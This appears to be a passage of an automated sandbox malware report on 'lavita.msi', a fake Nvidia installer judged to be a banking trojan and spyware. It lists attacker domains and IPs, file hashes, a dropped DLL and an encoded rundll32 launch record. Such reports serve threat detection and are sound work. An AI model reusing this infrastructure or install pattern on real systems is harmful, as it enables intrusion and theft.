                                                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000007.00000003.4387068567.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4610617935.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2403423241.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979103692.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dogirafer.com/test/t/explorer.exe, 00000007.00000002.4601098836.0000000002FBE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://www.advancedinstaller.comlavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://proliforetka.com/rexplorer.exe, 00000007.00000002.4615738228.000000000C3AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://api.msn.com/explorer.exe, 00000007.00000002.4606667288.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2402983007.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://proliforetka.com/uexplorer.exe, 00000007.00000002.4614759735.000000000C081000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://proliforetka.com/test/rexplorer.exe, 00000007.00000002.4614759735.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000007.00000000.2401087433.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603659222.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.16.1
                                                                                            		dogirafer.comUnited States
                                                                                            		13335CLOUDFLARENETUStrue
                                                                                            94.232.46.11
                                                                                            		muuxxu.comRussian Federation
                                                                                            		44477WELLWEBNLfalse
                                                                                            94.232.40.41
                                                                                            		cronoze.comRussian Federation
                                                                                            		44477WELLWEBNLfalse
                                                                                            172.67.161.60
                                                                                            		proliforetka.comUnited States
                                                                                            		13335CLOUDFLARENETUStrue

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1576900
                                                                                            Start date and time:2024-12-17 17:54:08 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 47s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:41
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Sample name:lavita.msi
                                                                                            Detection:MAL
                                                                                            Classification:mal100.spre.bank.troj.spyw.evad.winMSI@62/24@5/4
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            • Number of executed functions: 12
                                                                                            • Number of non-executed functions: 201
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .msi
                                                                                            • Override analysis time to 240s for rundll32

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 13.107.246.63, 20.12.23.50
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            • VT rate limit hit for: lavita.msi

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            11:55:28API Interceptor11628644x Sleep call for process: explorer.exe modified
                                                                                            11:57:22API Interceptor2x Sleep call for process: WMIC.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                            94.232.46.11appgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                              45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                  TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                    94.232.40.41appgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                      45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                        TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                          TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            muuxxu.comappgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.46.11
                                                                                                            45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.46.11
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.46.11
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.46.11
                                                                                                            bg.microsoft.map.fastly.netmjjt5kTb4o.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Clienter.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                            • 199.232.214.172
                                                                                                            BwQ1ZjHbt3.batGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                            • 199.232.210.172
                                                                                                            ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                            • 199.232.214.172
                                                                                                            payload_1.htaGet hashmaliciousRedLineBrowse
                                                                                                            • 199.232.210.172
                                                                                                            ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            dogirafer.comfes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 104.21.68.89
                                                                                                            wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 104.21.68.89
                                                                                                            zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 104.21.68.89
                                                                                                            cronoze.comappgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            WELLWEBNLappgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            avutil.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.43.224
                                                                                                            fes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 94.232.43.224
                                                                                                            wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 94.232.43.224
                                                                                                            sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            merd.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            WELLWEBNLappgpuset.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            TiNgny4xSB.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.40.41
                                                                                                            avutil.dll.dllGet hashmaliciousBruteRatelBrowse
                                                                                                            • 94.232.43.224
                                                                                                            fes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 94.232.43.224
                                                                                                            wait.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            • 94.232.43.224
                                                                                                            sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            merd.msiGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            sqx.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 94.232.40.38
                                                                                                            CLOUDFLARENETUShttps://escrowmedifllc.hostconstructionapp.com/qL3Zw/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.21.8.110
                                                                                                            Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.112.1
                                                                                                            https://evitefestivities.infoGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.8.110
                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 1.1.1.1
                                                                                                            https://tekascend.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            • 104.16.124.96
                                                                                                            http://ngfreemessage-verifying.freewebhostmost.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.193.76
                                                                                                            CLOUDFLARENETUShttps://escrowmedifllc.hostconstructionapp.com/qL3Zw/Get hashmaliciousUnknownBrowse
                                                                                                            • 104.21.8.110
                                                                                                            Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.96.1
                                                                                                            Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.112.1
                                                                                                            https://evitefestivities.infoGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.8.110
                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://cc.naver.com/cc?a=pst.link&m=1&nsc=Mblog.post&u=https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPyGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 1.1.1.1
                                                                                                            https://tekascend.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                            • 104.16.124.96
                                                                                                            http://ngfreemessage-verifying.freewebhostmost.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.17.25.14
                                                                                                            https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.193.76

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            a0e9f5d64349fb13191bc781f81f42e1sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            out.bin.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            jYd7FUgGZc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            sfWmEoGJQR.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            V65xPrgEHH.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60
                                                                                                            pN6iTXbhhc.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.16.1
                                                                                                            • 172.67.161.60

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Windows\Installer\MSIC2F1.tmp45c62e.msiGet hashmaliciousUnknownBrowse
                                                                                                              Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                                                                                klog.php.msiGet hashmaliciousMatanbuchusBrowse
                                                                                                                  Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                                                                                                                    fes.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      zdi.txt.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                        merd.msiGet hashmaliciousUnknownBrowse
                                                                                                                          medk.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                            lavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                              Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Config.Msi\42c1da.rbs

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:data
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):1403
                                                                                                                                Entropy (8bit):5.709973809083858
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:0lOg59dnZbnv68l9Ax939TlRpUXzSnISnoFPKybD4DhiSW6ESnISn5+OPzSnISnr:0ge9dtS8l9Ax939TlbblsPqD8SNlQ3lr
                                                                                                                                MD5:D8284FA67477F87A750BA60A8F79ACDC
                                                                                                                                SHA1:B1BF28AB3E5B1C6ED41D9C89985144B5E8F00A78
                                                                                                                                SHA-256:B9C2F1E667A6CF5B715A503ACD90F90D03A6DBA941A024BD023920995630E6A0
                                                                                                                                SHA-512:552F044D0A3FBC5996D04E24C4BA3491C5D699BE8070ECAF6675194BCC9449EFE81A9413DB9BBC355398B46B7071AEA660CEF90BC91D6E3D6623C84B3E2BDAD5
                                                                                                                                Malicious:false
                                                                                                                                Preview:...@IXOS.@.....@.^.Y.@.....@.....@.....@.....@.....@......&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}..Nvidia Manage..lavita.msi.@.....@..@..@.....@........&.{943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}.....@.....@.....@.....@.......@.....@.....@.......@......Nvidia Manage......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@......&.{D674043B-F548-4EAE-B311-F2B735308BAE}&.{6526CBB4-D28A-4CBC-AF93-907FED1F0EB9}.@........CreateFolders..Creating folders..Folder: [1]#.B.C:\Users\user\AppData\Roaming\Nvidia Manage INC\Nvidia Manage\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..).C:\Users\user\AppData\Roaming\gpuset\....6.C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll....WriteRegistryValues..

                                                                                                                                C:\Users\user\AppData\Roaming\gpuset\appgpuset.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3954176
                                                                                                                                Entropy (8bit):6.141171944490726
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:uUhs9XR3wxZXRTZUcuVHleFPH1FBJtFfmHrgdvs+s9bj5ZDhN4q:SagbONF30blJ7B
                                                                                                                                MD5:4717C34252551071AA41C2881315A4B8
                                                                                                                                SHA1:B239D502A5C200E63D13730219F7272A8D9E0FE7
                                                                                                                                SHA-256:EA2C9E620D779449A2D5176ACE0C4993934E85BE7A0207F3F51B4A432627AD2F
                                                                                                                                SHA-512:2FDA6766651AE4A2BD766026FAB9410CCA738EC0099302AA962243B11C6CB80D432A50D94D6DDC085B23EB71576732BEA1ADF0B9B2F5D6A127E60066AB379564
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......#?U.g^;.g^;.g^;..:8.j^;..:?.|^;..:>..^;.t88.n^;.t8>..^;.t8?.D^;....f^;.....d^;...>.b^;.|..w^;....f^;.....e^;....z^;.g^:..^;.[9>.x^;.[9?.f^;.[9;.f^;.[9.f^;.[99.f^;.Richg^;.........PE..d...g|hf.........." ......%..>...............................................`>.....V.2...`A.........................................[/.X.....3.,.....3.<L...P1..}....2.(&....>.. ..px+.8...................8.+.(....x+...............3..............................text...Q.%.......%................. ..`.rdata.......0%..0....%.............@..@.data...P....`/..b...H/.............@....pdata......P1......./.............@..@.idata...3....3..4...P1.............@..@.gfids..$1...@3..2....1.............@..@.giats........3.......1.............@..@minATL..).....3.......1.............@..@.00cfg........3.......1.............@..@.tls..........3.......1.............@....rsrc...<L....3..N....1.

                                                                                                                                C:\Users\user\NTUSER.DAT.Not

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\rundll32.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):124
                                                                                                                                Entropy (8bit):5.26290707352349
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:BkWVm3BZwlzdWoqyduHUyPYt28oZWVm3DskVLLrci5gn:BkSABZwpIAduHrAt2DSADXVbT+n
                                                                                                                                MD5:3E6C698C1C0D0E14E4D6CB8B86CDF8C2
                                                                                                                                SHA1:C083376418AC326B82350C36A112E38A9EE7844B
                                                                                                                                SHA-256:E22E6D12379DA162DC5D5EC8DA0260C9A5C4DA860775DE35C20CC41B738DDC9B
                                                                                                                                SHA-512:C274385C323B388A57723B570C1E6BC051F45E637D9FC10CD26AC93E77F6CA47E5E64C586626A0C747626D91E2CB390AD17281736D4D47D5DE613B3DAC95D052
                                                                                                                                Malicious:false
                                                                                                                                Preview:{YXBwZ3B1c2V0LmRsbA==, IkM6XFVzZXJzXGVuZ2luZWVyXEFwcERhdGFcUm9hbWluZ1xncHVzZXRcYXBwZ3B1c2V0LmRsbCI=, MQ==, R2ZlWGNvZGVGdW5j}

                                                                                                                                C:\Windows\Installer\42c1d8.msi

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {943AE3C8-CB21-42BD-93F4-79BEC1C03CE0}, Number of Words: 10, Subject: Nvidia Manage, Author: Nvidia Manage INC, Name of Creating Application: Nvidia Manage, Template: ;1033, Comments: Create database IInlimited, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2416640
                                                                                                                                Entropy (8bit):7.734482900935259
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:XqfTYBZKumZr7A31su1uXZn8Ud9JCM5Rm5hfJYPYtwRXIhMRs:oYnK/AhuSyJN5RmjJvi4+
                                                                                                                                MD5:B4D82D17669303BE46EDBF7B7C5823A2
                                                                                                                                SHA1:1D8E902129F1BFBA8D349403B5D45A737D1372C3
                                                                                                                                SHA-256:F071F083770FE89D0860BA0CF46EDA960D3CCF31639A18DDA8954A0C026165D9
                                                                                                                                SHA-512:A97E93833D37C7E0D1F01A58A86CDC97DC8AB3CC2D7A0E458B158627FF61C625CDDBBEE8DAAACBE9EFAE3F413AFE5B605156C3A6803EF1A68FBFCD921A55DFF6
                                                                                                                                Malicious:false
                                                                                                                                Preview:......................>...................%...................................D.......`......................................./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...............................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                C:\Windows\Installer\MSIC2F1.tmp

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):446944
                                                                                                                                Entropy (8bit):6.403916470886214
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: 45c62e.msi, Detection: malicious, Browse
                                                                                                                                • Filename: Doc_21-04-53.js, Detection: malicious, Browse
                                                                                                                                • Filename: klog.php.msi, Detection: malicious, Browse
                                                                                                                                • Filename: Doc_21-04-53.js, Detection: malicious, Browse
                                                                                                                                • Filename: fes.msi, Detection: malicious, Browse
                                                                                                                                • Filename: zdi.txt.msi, Detection: malicious, Browse
                                                                                                                                • Filename: merd.msi, Detection: malicious, Browse
                                                                                                                                • Filename: medk.msi, Detection: malicious, Browse
                                                                                                                                • Filename: lavi.msi, Detection: malicious, Browse
